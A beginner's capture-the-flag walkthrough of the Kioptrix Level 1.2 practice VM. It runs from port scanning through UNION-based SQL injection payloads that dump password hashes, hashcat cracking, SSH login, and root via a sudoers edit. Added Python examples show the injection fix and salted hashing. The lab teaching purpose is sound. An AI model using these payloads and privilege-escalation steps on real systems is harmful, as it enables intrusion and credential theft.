# Let's continue the Kioptrix series with Kioptrix Level 1.2 (#3)
The Kioptrix series is aimed at beginners and the challenges are therefore pretty easy. The objective is to get root access to the VM by any means possible, except by hacking the actual VM client. The purpose of these vulnerable VMs is to learn the basic techniques and tools used in penetration tests. There is more than one way of achieving the objective in this challenge.
The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is a VMware image and can be used in VMware Workstation or Player. You can convert the image to be compatible with VirtualBox.
## The Hack
The first step in every penetration test is intelligence gathering. This consists of passive / active recon and enumeration: find out which services on the target server are open to the world and which versions they are running, so that you can search for known vulnerabilities.
To achieve this we will be using a tool that will become the foundation of your pentesting toolkit: Nmap. The nmap man page can be found here; it explains all the options / flags / arguments usable with nmap.
```
apb@stratios:~$ nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p- 192.168.163.134
Nmap scan report for 192.168.163.134
Host is up, received user-set (0.00025s latency).
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Nmap done at Mon Feb 26 13:58:26 2018 -- 1 IP address (1 host up) scanned in 8.44 seconds
```
Only ports 22 and 80 are open. Browse to the IP and let's see what is happening on port 80.
They seem to be running LotusCMS. We can look for a version and see if there are known vulnerabilities. There is also a login page. Maybe it's vulnerable to SQLi.
Let’s run a nikto quickly against the web server and see if it picks up anything.
```
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.134
+ Target Port: 80
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 21:22:00 2009
+ DUOJJMCX Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: GET /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
```
After going through the nikto results we see they are running phpMyAdmin. phpMyAdmin is a web interface (lazy admins) to manage MySQL databases.
Let’s see if we can access phpmyadmin.
Since we know they are running a CMS and phpMyAdmin, which requires an SQL backend, we can attempt an SQLi.
... and the injection is successful.
Let's snoop around and see what we can find out.
*Couple of minutes later*
After a quick look there doesn’t seem to be anything of value.
Let's move on to the website / blog that's running on the host.
On the website's home page they seem to be going on about a new image gallery, so after browsing through a couple of pages within the gallery and using their "sort function", something caught my eye. In the URL: `id=1`.
Full URL: `http://kioptrixtrix3.com/gallery/gallery.php?id=1&sort=dateuploaded#photos`
It might be vulnerable to SQLi. Let's find out.
Modify the URL to include a `'` after the `id=1`.
And we got an SQL error, which means that it is vulnerable to SQLi. (The absence of an error would not have proven the parameter safe; an injectable parameter can also fail silently, it is just harder to confirm.)
Next we need to try and figure out how many columns this table has.
We use the same URL to query the database, appending the SQL fragment `order by 1 --`:
```
http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 1 --
```
If you don't receive an error, keep incrementing the number in "order by 1" by 1 until you do receive an error. When you reach the error page at "order by n", the table has n-1 columns.
In this case, you will get an error at
```
http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 7 --
```
So the number of columns is the number on the error page minus one: 7 - 1 = 6, this table has 6 columns.
Now that we know there are 6 columns, we need to determine which one is vulnerable.
We will use the “union select columns sequence” to find the vulnerable column in the table.
```
-1 union select 1,2,3,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,3,4,5,6 --
```
Depending on the database, the above might not work, so give the following a try
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 and 1=2 union select 1,2,3,4,5,6 --
```
The page will now display some of the numbers 1 to 6; each number that shows up is a column whose content the page renders, so it can be at most the number of columns.
Under "Sub Gallery" it displays 2 and 3. These could be our vulnerable points.
Let’s test and confirm.
Simple test would be to see if we can get the database version.
By using the "union select columns sequence" and replacing the 2 or 3 with `version()` or `@@version`:
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,version(),3,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,@@version,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,@@version,version(),4,5,6 --
```
As we can see, it is using MySQL 5.0.51a.
Let’s see which database and user the gallery is using.
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,database(),user(),4,5,6 --
```
Database: gallery, User: root
Next we have to find the table names in the database. Replace the 2 or 3 with `group_concat(table_name)` and add `from information_schema.tables where table_schema=database()` at the end, before the `--`:
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --
```
Now we have the tables stored in the database, and the dev_accounts looks the most promising.
Let's see if we can find out the columns within that table.
We need to make two changes to the statement.
First replace `group_concat(table_name)` with `group_concat(column_name)`.
Then replace `from information_schema.tables where table_schema=database()` with `FROM information_schema.columns WHERE table_name=mysqlchar`:
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=mysqlchar
```
Next we need to convert the table name to a MySQL CHAR() string to put in place of `mysqlchar`.
I used the HackBar add-on for Firefox to achieve this. Once the bar is installed you can go SQL -> MySQL -> MySQL CHAR().
A box will pop up where you enter the table name and it will convert it to CHAR:
```
CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
```
Now we have the column names of the dev_accounts table and we are especially interested in the username and password columns.
Next we try and read the data stored in the username and password column.
Again a couple of changes to the SQL statement.
Replace `group_concat(column_name)` with `group_concat(columnname,0x3a,anothercolumnname)` (0x3a is a colon, used as the separator).
Replace `from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)` with `from table_name`:
```
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts --
```
... and there we have two usernames with their password hashes.
Let's see if we can crack the passwords.
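The whole chain above (the quote error, ORDER BY counting and the UNION SELECT) works because gallery.php splices the raw `id` parameter into its SQL. As an added example that is not code from the post or from Kioptrix, here is that bug class next to its fix, using an in-memory SQLite table with a constructed row and hypothetical column names in place of the MySQL gallery table; the payloads are the ones used above.

```python
import sqlite3

# Constructed stand-in for the gallery table: six columns, as the ORDER BY
# probing above found. Column names and the sample row are hypothetical.
SCHEMA = ("CREATE TABLE gallery (id INTEGER, title TEXT, filename TEXT,"
          " dateuploaded TEXT, views INTEGER, owner TEXT)")
SAMPLE_ROW = (1, "Goat photo", "goat1.jpg", "2011-04-16", 10, "dreg")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO gallery VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROW)
    return db


def gallery_vulnerable(db, id_param):
    """The bug class behind gallery.php?id=: the raw parameter becomes part of
    the SQL text, so 'order by 7 --' and 'union select ...' are executed as SQL."""
    return db.execute("SELECT * FROM gallery WHERE id=" + id_param).fetchall()


def gallery_fixed(db, id_param):
    """Hardened version: the value is bound as a parameter and never parsed as
    SQL, so anything that is not a plain number simply matches no row."""
    return db.execute("SELECT * FROM gallery WHERE id=?", (id_param,)).fetchall()


def request(handler, id_param):
    """Simulate one HTTP request: run the handler on a fresh DB and return its
    rows, or the string 'sql error' where the page would have shown a MySQL error."""
    try:
        return handler(make_db(), id_param)
    except sqlite3.OperationalError:
        return "sql error"


if __name__ == "__main__":
    for payload in ("1", "1'", "1 order by 6 --", "1 order by 7 --",
                    "-1 union select 1,2,3,4,5,6 --"):
        print(repr(payload), "vulnerable:", request(gallery_vulnerable, payload),
              "| fixed:", request(gallery_fixed, payload))
```

The vulnerable handler errors on `order by 7` and returns the row `(1,2,3,4,5,6)` for the UNION payload, exactly the two signals used above; the fixed handler returns an empty result for both and never raises.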
Put the two hashes in a file.
```
apb@stratios:/tmp$ cat hashes.txt
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e
```
Using hashcat with the rockyou.txt wordlist that comes with Kali:
```
apb@stratios:/tmp$ hashcat -m 0 hashes.txt --force /usr/share/wordlists/rockyou.txt
hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 1024/2944 MB allocatable, 2MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Password length minimum: 0
Password length maximum: 256

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (0 secs)
Time.Estimated...: Tue Feb 27 12:09:20 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.00ms)
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 0/14344385 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Candidates.#1....: [Copying]
HWMon.Dev.#1.....: N/A

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (5 secs)
Time.Estimated...: Tue Feb 27 12:09:25 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 2198.2 kH/s (0.66ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10835968/14344385 (75.54%)
Rejected.........: 0/10835968 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> MarkBryan98
HWMon.Dev.#1.....: N/A

Started: Tue Feb 27 12:08:52 2018
Stopped: Tue Feb 27 12:09:26 2018
```
And there are our passwords.
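Both hashes fell in five seconds because dev_accounts stores plain, unsalted MD5, which is what hashcat's "Not-Salted / Not-Iterated / Raw-Hash" optimizers above refer to. The following is an added example, not code from the post or from Kioptrix: it reproduces the lookup against the page's two hashes with a constructed six-word list in place of rockyou.txt, and shows the salted, iterated PBKDF2 storage the table should have used instead (the `salt$iterations$hash` record format and function names are assumptions of this example).

```python
import hashlib
import hmac
import os

# The two dev_accounts hashes recovered above.
PAGE_HASHES = {"0d3eccfb887aabd50f243b3f155c0f85", "5badcaf789d3d1d09794d8f021f40f0e"}

# Constructed six-entry wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "MasterFlick", "starwars", "MarkBryan98", "Mast3r"]


def md5_wordlist_check(hashes, words):
    """Why the crack was instant: with unsalted MD5 one hash per candidate word is
    compared against every stored hash at once. Returns {hash: word} for each hit."""
    hits = {}
    for word in words:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in hashes:
            hits[digest] = word
    return hits


def pbkdf2_store(password, iterations=200_000, salt=None):
    """What dev_accounts should hold instead: a random per-user salt plus an
    iterated hash, so each user costs separate work and no precomputation helps.
    Record format (an assumption of this example): salt$iterations$hash, all hex."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(md5_wordlist_check(PAGE_HASHES, WORDLIST))
    record = pbkdf2_store("starwars")
    print(record, pbkdf2_verify("starwars", record))
```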
Now we can try and SSH into the server with the above credentials.
```
apb@stratios:~$ ssh email@example.com
firstname.lastname@example.org's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
```
Let's see what we are allowed to run with sudo:
```
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
```
So we can edit files as root using this "ht" program, which makes the `!/usr/bin/su` exclusion pointless: an editor running as root can change any file, including the sudo policy itself. Let's see if we can edit the /etc/sudoers file and give ourselves permission to su to root.
```
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
```
… my. poor. eyes…
Press ALT + F to open the File menu and select Open.
Once the file is open, add the following:
```
loneferret ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
```
Save and quit the file.
Now try `sudo su -`:
```
loneferret@Kioptrix3:~$ sudo su -
root@Kioptrix3:~#
```
And there we have root access to the target machine.
This one was definitely more challenging than the first two. I had to read up quite a bit for the SQLi queries. But this is how one learns, and you cannot beat the satisfying feeling of solving a problem.